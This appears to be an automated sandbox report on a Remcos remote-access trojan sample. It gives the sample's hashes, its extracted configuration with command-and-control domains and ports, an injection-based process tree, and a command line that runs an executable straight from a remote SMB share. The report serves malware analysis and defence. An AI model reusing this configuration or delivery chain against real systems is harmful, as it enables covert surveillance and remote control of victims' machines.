remcos | 392624a0ee0d3c34ae9ad9607e9f8683156447379beac0ec8519c70dedbb74d0

General

Target

Agenzia.url
Size

200B
MD5

e8e03b91b2802891c978c8a67999bd10
SHA1

af767e90f1017c588451f6019a199876349e4f7c
SHA256

285a563c4e37ac89fafa49aed8e5bedb5dcb2a310860c2daf7c3fdffc094cccf
SHA512

e95bac88b49a6b196f5c2bbf3a0932434ce1841bc1f9e97ad031606f999dbddef82363cba298301bc749e44e7012550e820e932ce0859b57085b97470310f87d

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

listpoints.online:4050

retghrtgwtrgtg.bounceme.net:3839

listpoints.click:7020

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
explorer.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WLPZI6
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4136 created 2388	4136	provvedimento.exe	20

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 1 IoCs

pid	Process
3424	WebCopier.exe

Loads dropped DLL 1 IoCs

pid	Process
3424	WebCopier.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3424 set thread context of 4768	3424	WebCopier.exe	101

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4136	provvedimento.exe
4136	provvedimento.exe
4136	provvedimento.exe
3424	WebCopier.exe
3424	WebCopier.exe
4768	cmd.exe
4768	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3424	WebCopier.exe
4768	cmd.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4136	provvedimento.exe
4136	provvedimento.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2388 wrote to memory of 4136	2388	rundll32.exe	89
PID 2388 wrote to memory of 4136	2388	rundll32.exe	89
PID 2388 wrote to memory of 4136	2388	rundll32.exe	89
PID 4136 wrote to memory of 3424	4136	provvedimento.exe	100
PID 4136 wrote to memory of 3424	4136	provvedimento.exe	100
PID 4136 wrote to memory of 3424	4136	provvedimento.exe	100
PID 3424 wrote to memory of 4768	3424	WebCopier.exe	101
PID 3424 wrote to memory of 4768	3424	WebCopier.exe	101
PID 3424 wrote to memory of 4768	3424	WebCopier.exe	101
PID 3424 wrote to memory of 4768	3424	WebCopier.exe	101
PID 4768 wrote to memory of 4460	4768	cmd.exe	112
PID 4768 wrote to memory of 4460	4768	cmd.exe	112
PID 4768 wrote to memory of 4460	4768	cmd.exe	112
PID 4768 wrote to memory of 4460	4768	cmd.exe	112

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2388
- \??\UNC\62.173.141.118\scarica\provvedimento.exe
  "\\62.173.141.118\scarica\provvedimento.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4136
- C:\Users\Admin\AppData\Roaming\ZO_App_test_2\WebCopier.exe
  C:\Users\Admin\AppData\Roaming\ZO_App_test_2\WebCopier.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:4768
  - - C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      4⤵
      PID:4460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\214dcbe5

Filesize
1.1MB

MD5
6570a57adceeb97972fe20a936d156ff

SHA1
e39f0ef0919ebdfd1382655742b8ab380b690372

SHA256
2abc8fc2d0958f5650aaa7f1af7c399174699e99fce077f91c0c1f177ab2b352

SHA512
96cc445324142568884ca3dc5a2669455cf866f72c9bd255236d230d6ea67a888c655ec3bc604d4236803cb17d4c7096b3703c9019c34152bb1eadd7371c15fb

Download Submit
C:\Users\Admin\AppData\Roaming\ZO_App_test_2\WCUtil.dll

Filesize
180KB

MD5
c96b50cd072d1d1a556051adce915c73

SHA1
84d7c53e64c9b3c900f78d0749196f5c61c78e25

SHA256
f366d535c63702f7412cfe4ec1c63edc3dd86c44f2d42ce9e6cfd63cec78d930

SHA512
a1d4ba93d8963b6c7c758eeb97184828d484e48c9ee7c422050cda98d4d61474985e93e50d67a99dbc5d7a715a1b30a1cda7fbb7a14328da4bed9e4d3f203cf8

Download Submit
C:\Users\Admin\AppData\Roaming\ZO_App_test_2\WCUtil.dll

Filesize
180KB

MD5
c96b50cd072d1d1a556051adce915c73

SHA1
84d7c53e64c9b3c900f78d0749196f5c61c78e25

SHA256
f366d535c63702f7412cfe4ec1c63edc3dd86c44f2d42ce9e6cfd63cec78d930

SHA512
a1d4ba93d8963b6c7c758eeb97184828d484e48c9ee7c422050cda98d4d61474985e93e50d67a99dbc5d7a715a1b30a1cda7fbb7a14328da4bed9e4d3f203cf8

Download Submit
C:\Users\Admin\AppData\Roaming\ZO_App_test_2\WebCopier.exe

Filesize
7.2MB

MD5
e2a27870ba4da90df6276c4da9e3cf82

SHA1
cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68

SHA256
9f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2

SHA512
66c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235

Download Submit
C:\Users\Admin\AppData\Roaming\ZO_App_test_2\WebCopier.exe

Filesize
7.2MB

MD5
e2a27870ba4da90df6276c4da9e3cf82

SHA1
cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68

SHA256
9f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2

SHA512
66c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235

Download Submit
C:\Users\Admin\AppData\Roaming\ZO_App_test_2\bluethroat.eps

Filesize
925KB

MD5
b42bc4ba258e9733402cc17ab113d004

SHA1
92fb014f241d3b5a97a9e8b9b7d05f058185d576

SHA256
fd01121de26f876d62e9f8a91d1237804c061aa485322a950a0716cf6e5c45f0

SHA512
c19e24963e5121b6c055736348e68044247b7ea3f0711235e9f8e54b26aa6dc89b78d25056070138d4f144b472daebb4e2b93397ef7108cd88f74b4aa43807e8

Download Submit
memory/3424-20-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/3424-21-0x00007FFB55610000-0x00007FFB55805000-memory.dmp

Filesize
2.0MB

Download
memory/3424-22-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/3424-24-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/4136-13-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/4136-9-0x00007FFB55610000-0x00007FFB55805000-memory.dmp

Filesize
2.0MB

Download
memory/4136-8-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/4136-23-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/4136-7-0x0000000005170000-0x0000000005180000-memory.dmp

Filesize
64KB

Download
memory/4460-35-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4460-41-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4460-47-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4460-43-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4460-42-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4460-34-0x00007FFB55610000-0x00007FFB55805000-memory.dmp

Filesize
2.0MB

Download
memory/4460-40-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4460-38-0x0000000000260000-0x0000000000693000-memory.dmp

Filesize
4.2MB

Download
memory/4460-39-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4768-26-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/4768-28-0x00007FFB55610000-0x00007FFB55805000-memory.dmp

Filesize
2.0MB

Download
memory/4768-33-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/4768-31-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download
memory/4768-30-0x0000000073D70000-0x0000000073EEB000-memory.dmp

Filesize
1.5MB

Download

Analysis

Sharing